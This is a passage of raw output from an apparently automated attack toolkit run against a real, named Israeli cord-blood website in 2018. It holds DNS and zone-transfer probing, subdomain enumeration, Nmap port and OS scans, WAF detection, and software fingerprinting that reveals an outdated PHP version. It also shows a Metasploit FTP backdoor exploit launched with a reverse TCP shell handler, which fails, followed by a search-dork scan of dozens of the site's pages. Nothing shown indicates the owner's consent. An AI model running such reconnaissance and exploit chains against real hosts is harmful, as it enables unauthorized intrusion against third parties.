  736. [+] Selected safe Round-Trip Time value is: 2.02347 sec
  737. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  738. [-] fingerprint:smb need either TCP port 139 or 445 to run
  739. [+] Primary guess:
  740. [+] Host 80.179.142.111 Running OS: (Guess probability: 88%)
  741. [+] Other guesses:
  742. [+] Host 80.179.142.111 Running OS: (Guess probability: 88%)
  751. [+] Cleaning up scan engine
  752. [+] Modules deinitialized
  753. [+] Execution completed.
  754. #######################################################################################################################################
  755. ----- cord-blood.co.il -----
  756.  
  757.  
  758. Host's addresses:
  759. __________________
  760.  
  761. cord-blood.co.il. 14380 IN A 80.179.142.111
  762.  
  763.  
  764. Name Servers:
  765. ______________
  766.  
  767. ns2.spd.co.il. 31989 IN A 80.179.148.8
  768. ns1.spd.co.il. 27534 IN A 212.199.164.175
  769.  
  770.  
  771. Mail (MX) Servers:
  772. ___________________
  773.  
  774. mailgw2.spd.co.il. 38400 IN A 192.116.71.71
  775.  
  776.  
  777. Trying Zone Transfers and getting Bind Versions:
  778. _________________________________________________
  779.  
  780.  
  781. Trying Zone Transfer for cord-blood.co.il on ns2.spd.co.il ...
  782.  
  783. Trying Zone Transfer for cord-blood.co.il on ns1.spd.co.il ...
  784.  
  785. brute force file not specified, bay.
  786. =======================================================================================================================================
  787. GATHERING DNS SUBDOMAINS
  788. =======================================================================================================================================
  789.  
  790. ____ _ _ _ _ _____
  791. / ___| _ _| |__ | (_)___| |_|___ / _ __
  792. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  793. ___) | |_| | |_) | | \__ \ |_ ___) | |
  794. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  795.  
  796. # Coded By Ahmed Aboul-Ela - @aboul3la
  797.  
  798. [-] Enumerating subdomains now for cord-blood.co.il
  799. [-] verbosity is enabled, will show the subdomains results in realtime
  800. [-] Searching now in Baidu..
  801. [-] Searching now in Yahoo..
  802. [-] Searching now in Google..
  803. [-] Searching now in Bing..
  804. [-] Searching now in Ask..
  805. [-] Searching now in Netcraft..
  806. [-] Searching now in DNSdumpster..
  807. [-] Searching now in Virustotal..
  808. [-] Searching now in ThreatCrowd..
  809. [-] Searching now in SSL Certificates..
  810. [-] Searching now in PassiveDNS..
  811. Virustotal: www.cord-blood.co.il
  812. Yahoo: www.cord-blood.co.il
  813. [-] Saving results to file: /usr/share/sniper/loot/cord-blood.co.il/domains/domains-cord-blood.co.il.txt
  814. [-] Total Unique Subdomains Found: 1
  815. www.cord-blood.co.il
  816. #######################################################################################################################################
  817. [+] Hosts found in search engines:
  818. -------------------------------------------------------------------------------------------------------------------------------------
  819. [-] Resolving hostnames IPs...
  820. 80.179.142.111:www.cord-blood.co.il
  821. [+] Virtual hosts:
  822. ======================================================================================================================================
  843. #######################################################################################################################################
  844. ======================================================================================================================================
  845. PINGING HOST
  846. ======================================================================================================================================
  847. PING cord-blood.co.il (80.179.142.111) 56(84) bytes of data.
  848. 64 bytes from yanir.spd.co.il (80.179.142.111): icmp_seq=1 ttl=52 time=731 ms
  849.  
  850. --- cord-blood.co.il ping statistics ---
  851. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  852. rtt min/avg/max/mdev = 731.168/731.168/731.168/0.000 ms
  853.  
  854. #######################################################################################################################################
  855.  
  856. Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-23 00:14 EDT
  857. Nmap scan report for cord-blood.co.il (80.179.142.111)
  858. Host is up (0.60s latency).
  859. rDNS record for 80.179.142.111: yanir.spd.co.il
  860. Not shown: 447 closed ports, 18 filtered ports
  861. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  862. PORT STATE SERVICE
  863. 21/tcp open ftp
  864. 53/tcp open domain
  865. 80/tcp open http
  866. 110/tcp open pop3
  867. 143/tcp open imap
  868. 443/tcp open https
  869. 587/tcp open submission
  870. 993/tcp open imaps
  871. 995/tcp open pop3s
  872. 5353/tcp open mdns
  873. 8080/tcp open http-proxy
  874. #######################################################################################################################################
  875. Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-23 00:15 EDT
  876. Nmap scan report for cord-blood.co.il (80.179.142.111)
  877. Host is up.
  878. rDNS record for 80.179.142.111: yanir.spd.co.il
  879.  
  880. PORT STATE SERVICE
  881. 53/udp open|filtered domain
  882. 67/udp open|filtered dhcps
  883. 68/udp open|filtered dhcpc
  884. 69/udp open|filtered tftp
  885. 88/udp open|filtered kerberos-sec
  886. 123/udp open|filtered ntp
  887. 137/udp open|filtered netbios-ns
  888. 138/udp open|filtered netbios-dgm
  889. 139/udp open|filtered netbios-ssn
  890. 161/udp open|filtered snmp
  891. 162/udp open|filtered snmptrap
  892. 389/udp open|filtered ldap
  893. 520/udp open|filtered route
  894. 2049/udp open|filtered nfs
  895. #######################################################################################################################################
  896. Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-23 00:15 EDT
  897. Nmap scan report for cord-blood.co.il (80.179.142.111)
  898. Host is up (0.16s latency).
  899. rDNS record for 80.179.142.111: yanir.spd.co.il
  900.  
  901. PORT STATE SERVICE VERSION
  902. 21/tcp filtered ftp
  903. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  904. Device type: firewall|general purpose
  905. Running: Linux 2.4.X|2.6.X, ISS embedded
  906. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  907. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  908.  
  909. TRACEROUTE (using proto 1/icmp)
  910. HOP RTT ADDRESS
  911. 1 ... 30
  912. #######################################################################################################################################
  913. RHOST => cord-blood.co.il
  914. RHOSTS => cord-blood.co.il
  915. [*] cord-blood.co.il:21 - Banner: 220 FTP Server
  916. [*] cord-blood.co.il:21 - USER: 331 Password required for RcBY:)
  917. [*] Exploit completed, but no session was created.
  918. [*] Started reverse TCP double handler on 10.211.1.5:4444
  919. [*] cord-blood.co.il:21 - Sending Backdoor Command
  920. [-] cord-blood.co.il:21 - Not backdoored
  921. [*] Exploit completed, but no session was created.
  922. + -- --=[Port 22 closed... skipping.
  923. + -- --=[Port 23 closed... skipping.
  924. + -- --=[Port 25 closed... skipping.
  925. + -- --=[Port 53 opened... running tests...
  926.  
  927. Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-23 00:16 EDT
  928. Nmap scan report for cord-blood.co.il (80.179.142.111)
  929. Host is up (0.099s latency).
  930. rDNS record for 80.179.142.111: yanir.spd.co.il
  931.  
  932. PORT STATE SERVICE VERSION
  933. 53/tcp filtered domain
  934. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  935. Device type: firewall|general purpose
  936. Running: Linux 2.4.X|2.6.X, ISS embedded
  937. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  938. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  939.  
  940. Host script results:
  941. | dns-brute:
  942. | DNS Brute-force hostnames:
  1019. #######################################################################################################################################
  1020. Checking http://cord-blood.co.il
  1021. Generic Detection results:
  1022. The site http://cord-blood.co.il seems to be behind a WAF or some sort of security solution
  1023. Reason: The server returned a different response code when a string trigged the blacklist.
  1024. Normal response code is "404", while the response code to an attack is "302"
  1025. Number of requests: 11
  1026. #######################################################################################################################################
  1027. + -- --=[Checking if X-Content options are enabled on cord-blood.co.il...
  1028.  
  1029. + -- --=[Checking if X-Frame options are enabled on cord-blood.co.il...
  1030.  
  1031. + -- --=[Checking if X-XSS-Protection header is enabled on cord-blood.co.il...
  1032.  
  1033. + -- --=[Checking HTTP methods on cord-blood.co.il...
  1034.  
  1035. + -- --=[Checking if TRACE method is enabled on cord-blood.co.il...
  1036.  
  1037. + -- --=[Checking for META tags on cord-blood.co.il...
  1038.  
  1039. + -- --=[Checking for open proxy on cord-blood.co.il...
  1040. <html>Nginx is functioning normally</html>
  1041.  
  1042. + -- --=[Enumerating software on cord-blood.co.il...
  1043. Server: nginx
  1044. X-Powered-By: PHP/5.2.17
  1045. X-Pingback: http://www.cord-blood.co.il/xmlrpc.php
  1046.  
  1047. + -- --=[Checking if Strict-Transport-Security is enabled on cord-blood.co.il...
  1048.  
  1049. + -- --=[Checking for Flash cross-domain policy on cord-blood.co.il...
  1050. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1051. <html><head>
  1052. <title>404 Not Found</title>
  1053. </head><body>
  1054. <h1>Not Found</h1>
  1055. <p>The requested URL /crossdomain.xml was not found on this server.</p>
  1056. <p>Additionally, a 404 Not Found
  1057. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1058. </body></html>
  1059.  
  1060. + -- --=[Checking for Silverlight cross-domain policy on cord-blood.co.il...
  1061. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1062. <html><head>
  1063. <title>404 Not Found</title>
  1064. </head><body>
  1065. <h1>Not Found</h1>
  1066. <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
  1067. <p>Additionally, a 404 Not Found
  1068. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1069. </body></html>
  1070.  
  1071. + -- --=[Checking for HTML5 cross-origin resource sharing on cord-blood.co.il...
  1072.  
  1073. + -- --=[Retrieving robots.txt on cord-blood.co.il...
  1074. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1075. <html><head>
  1076. <title>404 Not Found</title>
  1077. </head><body>
  1078. <h1>Not Found</h1>
  1079. <p>The requested URL /robots.txt was not found on this server.</p>
  1080. <p>Additionally, a 404 Not Found
  1081. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1082. </body></html>
  1083.  
  1084. + -- --=[Retrieving sitemap.xml on cord-blood.co.il...
  1085. <changefreq>weekly</changefreq>
  1086. <priority>0.6</priority>
  1087. </url>
  1088. <url>
  1089. <loc>http://www.cord-blood.co.il/?page_id=2</loc>
  1090. <lastmod>2009-07-07T17:13:36+00:00</lastmod>
  1091. <changefreq>weekly</changefreq>
  1092. <priority>0.6</priority>
  1093. </url>
  1094. <!-- Debug: End Postings --><!-- Debug: Start Custom Pages --><!-- Debug: End Custom Pages --><!-- Debug: Start additional URLs --><!-- Debug: End additional URLs --></urlset>
  1095. + -- --=[Checking cookie attributes on cord-blood.co.il...
  1096.  
  1097. + -- --=[Checking for ASP.NET Detailed Errors on cord-blood.co.il...
  1098. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1099. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1100. ######################################################################################################################################
  1101. __[ ! ] Neither war between hackers, nor peace for the system.
  1102. __[ ! ] http://blog.inurl.com.br
  1103. __[ ! ] http://fb.com/InurlBrasil
  1104. __[ ! ] http://twitter.com/@googleinurl
  1105. __[ ! ] http://github.com/googleinurl
  1106. __[ ! ] Current PHP version::[ 7.2.3-1 ]
  1107. __[ ! ] Current script owner::[ root ]
  1108. __[ ! ] Current uname::[ Linux JTSEC 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64 ]
  1109. __[ ! ] Current pwd::[ /usr/share/sniper ]
  1110. __[ ! ] Help: php inurlbr.php --help
  1111. ------------------------------------------------------------------------------------------------------------------------
  1112.  
  1113. [ ! ] Starting SCANNER INURLBR 2.1 at [23-03-2018 00:24:45]
  1114. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1115. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1116. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1117.  
  1118. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-cord-blood.co.il.txt ]
  1119. [ INFO ][ DORK ]::[ site:cord-blood.co.il ]
  1120. [ INFO ][ SEARCHING ]:: {
  1121. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.mt ]
  1122.  
  1123. [ INFO ][ SEARCHING ]::
  1124. -[:::]
  1125. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1126.  
  1127. [ INFO ][ SEARCHING ]::
  1128. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1129. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.sb ID: 010479943387663786936:wjwf2xkhfmq ]
  1130.  
  1131. [ INFO ][ SEARCHING ]::
  1132. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1133.  
  1134. [ INFO ][ TOTAL FOUND VALUES ]:: [ 74 ]
  1135.  
  1136.  
  1137. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1138. |_[ + ] [ 0 / 74 ]-[00:25:12] [ - ]
  1139. |_[ + ] Target:: [ http://www.cord-blood.co.il/ ]
  1140. |_[ + ] Exploit::
  1141. |_[ + ] Information Server:: , , IP::0
  1142. |_[ + ] More details::
  1143. |_[ + ] Found:: UNIDENTIFIED
  1144. |_[ + ] ERROR CONECTION:: Resolving timed out after 5000 milliseconds
  1145.  
  1146. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1147. |_[ + ] [ 1 / 74 ]-[00:25:20] [ - ]
  1148. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=11 ]
  1149. |_[ + ] Exploit::
  1150. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1151. |_[ + ] More details:: / - / , ISP:
  1152. |_[ + ] Found:: UNIDENTIFIED
  1153.  
  1154. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1155. |_[ + ] [ 2 / 74 ]-[00:25:28] [ - ]
  1156. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=22 ]
  1157. |_[ + ] Exploit::
  1158. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1159. |_[ + ] More details:: / - / , ISP:
  1160. |_[ + ] Found:: UNIDENTIFIED
  1161.  
  1162. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1163. |_[ + ] [ 3 / 74 ]-[00:25:32] [ - ]
  1164. |_[ + ] Target:: [ http://www.cord-blood.co.il/?page_id=2 ]
  1165. |_[ + ] Exploit::
  1166. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1167. |_[ + ] More details:: / - / , ISP:
  1168. |_[ + ] Found:: UNIDENTIFIED
  1169.  
  1170. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1171. |_[ + ] [ 4 / 74 ]-[00:25:36] [ - ]
  1172. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=50 ]
  1173. |_[ + ] Exploit::
  1174. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1175. |_[ + ] More details:: / - / , ISP:
  1176. |_[ + ] Found:: UNIDENTIFIED
  1177.  
  1178. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1179. |_[ + ] [ 5 / 74 ]-[00:25:40] [ - ]
  1180. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=40 ]
  1181. |_[ + ] Exploit::
  1182. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1183. |_[ + ] More details:: / - / , ISP:
  1184. |_[ + ] Found:: UNIDENTIFIED
  1185.  
  1186. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1187. |_[ + ] [ 6 / 74 ]-[00:25:46] [ - ]
  1188. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=15 ]
  1189. |_[ + ] Exploit::
  1190. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1191. |_[ + ] More details:: / - / , ISP:
  1192. |_[ + ] Found:: UNIDENTIFIED
  1193.  
  1194. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1195. |_[ + ] [ 7 / 74 ]-[00:25:53] [ - ]
  1196. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=44 ]
  1197. |_[ + ] Exploit::
  1198. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1199. |_[ + ] More details:: / - / , ISP:
  1200. |_[ + ] Found:: UNIDENTIFIED
  1201. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 3686 bytes received
  1202.  
  1203. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1204. |_[ + ] [ 8 / 74 ]-[00:25:57] [ - ]
  1205. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=42 ]
  1206. |_[ + ] Exploit::
  1207. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1208. |_[ + ] More details:: / - / , ISP:
  1209. |_[ + ] Found:: UNIDENTIFIED
  1210.  
  1211. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1212. |_[ + ] [ 9 / 74 ]-[00:26:01] [ - ]
  1213. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=25 ]
  1214. |_[ + ] Exploit::
  1215. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1216. |_[ + ] More details:: / - / , ISP:
  1217. |_[ + ] Found:: UNIDENTIFIED
  1218.  
  1219. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1220. |_[ + ] [ 10 / 74 ]-[00:26:07] [ - ]
  1221. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=3 ]
  1222. |_[ + ] Exploit::
  1223. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1224. |_[ + ] More details:: / - / , ISP:
  1225. |_[ + ] Found:: UNIDENTIFIED
  1226.  
  1227. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1228. |_[ + ] [ 11 / 74 ]-[00:26:10] [ - ]
  1229. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=30 ]
  1230. |_[ + ] Exploit::
  1231. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1232. |_[ + ] More details:: / - / , ISP:
  1233. |_[ + ] Found:: UNIDENTIFIED
  1234.  
  1235. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1236. |_[ + ] [ 12 / 74 ]-[00:26:14] [ - ]
  1237. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=19 ]
  1238. |_[ + ] Exploit::
  1239. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1240. |_[ + ] More details:: / - / , ISP:
  1241. |_[ + ] Found:: UNIDENTIFIED
  1242.  
  1243. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1244. |_[ + ] [ 13 / 74 ]-[00:26:20] [ - ]
  1245. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=32 ]
  1246. |_[ + ] Exploit::
  1247. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1248. |_[ + ] More details:: / - / , ISP:
  1249. |_[ + ] Found:: UNIDENTIFIED
  1250.  
  1251. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1252. |_[ + ] [ 14 / 74 ]-[00:26:24] [ - ]
  1253. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=27 ]
  1254. |_[ + ] Exploit::
  1255. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1256. |_[ + ] More details:: / - / , ISP:
  1257. |_[ + ] Found:: UNIDENTIFIED
  1258.  
  1259. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1260. |_[ + ] [ 15 / 74 ]-[00:26:27] [ - ]
  1261. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=48 ]
  1262. |_[ + ] Exploit::
  1263. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1264. |_[ + ] More details:: / - / , ISP:
  1265. |_[ + ] Found:: UNIDENTIFIED
  1266.  
  1267. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1268. |_[ + ] [ 16 / 74 ]-[00:26:31] [ - ]
  1269. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=דם ]
  1270. |_[ + ] Exploit::
  1271. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1272. |_[ + ] More details:: / - / , ISP:
  1273. |_[ + ] Found:: UNIDENTIFIED
  1274.  
  1275. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1276. |_[ + ] [ 17 / 74 ]-[00:26:36] [ - ]
  1277. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=מיילדת ]
  1278. |_[ + ] Exploit::
  1279. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1280. |_[ + ] More details:: / - / , ISP:
  1281. |_[ + ] Found:: UNIDENTIFIED
  1282.  
  1283. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1284. |_[ + ] [ 18 / 74 ]-[00:26:40] [ - ]
  1285. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=4 ]
  1286. |_[ + ] Exploit::
  1287. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1288. |_[ + ] More details:: / - / , ISP:
  1289. |_[ + ] Found:: UNIDENTIFIED
  1290.  
  1291. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1292. |_[ + ] [ 19 / 74 ]-[00:26:44] [ - ]
  1293. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=38 ]
  1294. |_[ + ] Exploit::
  1295. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1296. |_[ + ] More details:: / - / , ISP:
  1297. |_[ + ] Found:: UNIDENTIFIED
  1298.  
  1299. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1300. |_[ + ] [ 20 / 74 ]-[00:26:47] [ - ]
  1301. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=עובר ]
  1302. |_[ + ] Exploit::
  1303. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1304. |_[ + ] More details:: / - / , ISP:
  1305. |_[ + ] Found:: UNIDENTIFIED
  1306.  
  1307. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1308. |_[ + ] [ 21 / 74 ]-[00:26:51] [ - ]
  1309. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=סרטן ]
  1310. |_[ + ] Exploit::
  1311. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1312. |_[ + ] More details:: / - / , ISP:
  1313. |_[ + ] Found:: UNIDENTIFIED
  1314.  
  1315. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1316. |_[ + ] [ 22 / 74 ]-[00:26:55] [ - ]
  1317. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=לידה ]
  1318. |_[ + ] Exploit::
  1319. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1320. |_[ + ] More details:: / - / , ISP:
  1321. |_[ + ] Found:: UNIDENTIFIED
  1322.  
  1323. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1324. |_[ + ] [ 23 / 74 ]-[00:26:59] [ - ]
  1325. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=אתיקה ]
  1326. |_[ + ] Exploit::
  1327. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1328. |_[ + ] More details:: / - / , ISP:
  1329. |_[ + ] Found:: UNIDENTIFIED
  1330.  
  1331. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1332. |_[ + ] [ 24 / 74 ]-[00:27:02] [ - ]
  1333. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=מחלות ]
  1334. |_[ + ] Exploit::
  1335. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1336. |_[ + ] More details:: / - / , ISP:
  1337. |_[ + ] Found:: UNIDENTIFIED
  1338.  
  1339. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1340. |_[ + ] [ 25 / 74 ]-[00:27:06] [ - ]
  1341. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=אנמיה ]
  1342. |_[ + ] Exploit::
  1343. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1344. |_[ + ] More details:: / - / , ISP:
  1345. |_[ + ] Found:: UNIDENTIFIED
  1346.  
  1347. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1348. |_[ + ] [ 26 / 74 ]-[00:27:09] [ - ]
  1349. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=רפואה ]
  1350. |_[ + ] Exploit::
  1351. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1352. |_[ + ] More details:: / - / , ISP:
  1353. |_[ + ] Found:: UNIDENTIFIED
  1354.  
  1355. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1356. |_[ + ] [ 27 / 74 ]-[00:27:13] [ - ]
  1357. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=5 ]
  1358. |_[ + ] Exploit::
  1359. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1360. |_[ + ] More details:: / - / , ISP:
  1361. |_[ + ] Found:: UNIDENTIFIED
  1362.  
  1363. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1364. |_[ + ] [ 28 / 74 ]-[00:27:18] [ - ]
  1365. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=לוקמיה ]
  1366. |_[ + ] Exploit::
  1367. |_[ + ] Information Server:: , , IP::0
  1368. |_[ + ] More details::
  1369. |_[ + ] Found:: UNIDENTIFIED
  1370. |_[ + ] ERROR CONECTION:: Resolving timed out after 5000 milliseconds
  1371.  
  1372. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1373. |_[ + ] [ 29 / 74 ]-[00:27:23] [ - ]
  1374. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=93 ]
  1375. |_[ + ] Exploit::
  1376. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1377. |_[ + ] More details:: / - / , ISP:
  1378. |_[ + ] Found:: UNIDENTIFIED
  1379.  
  1380. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1381. |_[ + ] [ 30 / 74 ]-[00:27:27] [ - ]
  1382. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=בריאות ]
  1383. |_[ + ] Exploit::
  1384. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1385. |_[ + ] More details:: / - / , ISP:
  1386. |_[ + ] Found:: UNIDENTIFIED
  1387.  
  1388. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1389. |_[ + ] [ 31 / 74 ]-[00:27:31] [ - ]
  1390. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=23 ]
  1391. |_[ + ] Exploit::
  1392. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1393. |_[ + ] More details:: / - / , ISP:
  1394. |_[ + ] Found:: UNIDENTIFIED
  1395.  
  1396. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1397. |_[ + ] [ 32 / 74 ]-[00:27:36] [ - ]
  1398. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=ביוקורד ]
  1399. |_[ + ] Exploit::
  1400. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: nginx , IP:80.179.142.111:80
  1401. |_[ + ] More details:: / - / , ISP:
  1402. |_[ + ] Found:: UNIDENTIFIED
  1403.  
  1404. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1405. |_[ + ] [ 33 / 74 ]-[00:27:41] [ - ]
  1406. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=השתלה ]
  1407. |_[ + ] Exploit::
  1408. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1409. |_[ + ] More details:: / - / , ISP:
  1410. |_[ + ] Found:: UNIDENTIFIED
  1411.  
  1412. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1413. |_[ + ] [ 34 / 74 ]-[00:27:45] [ - ]
  1414. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=קנולציה ]
  1415. |_[ + ] Exploit::
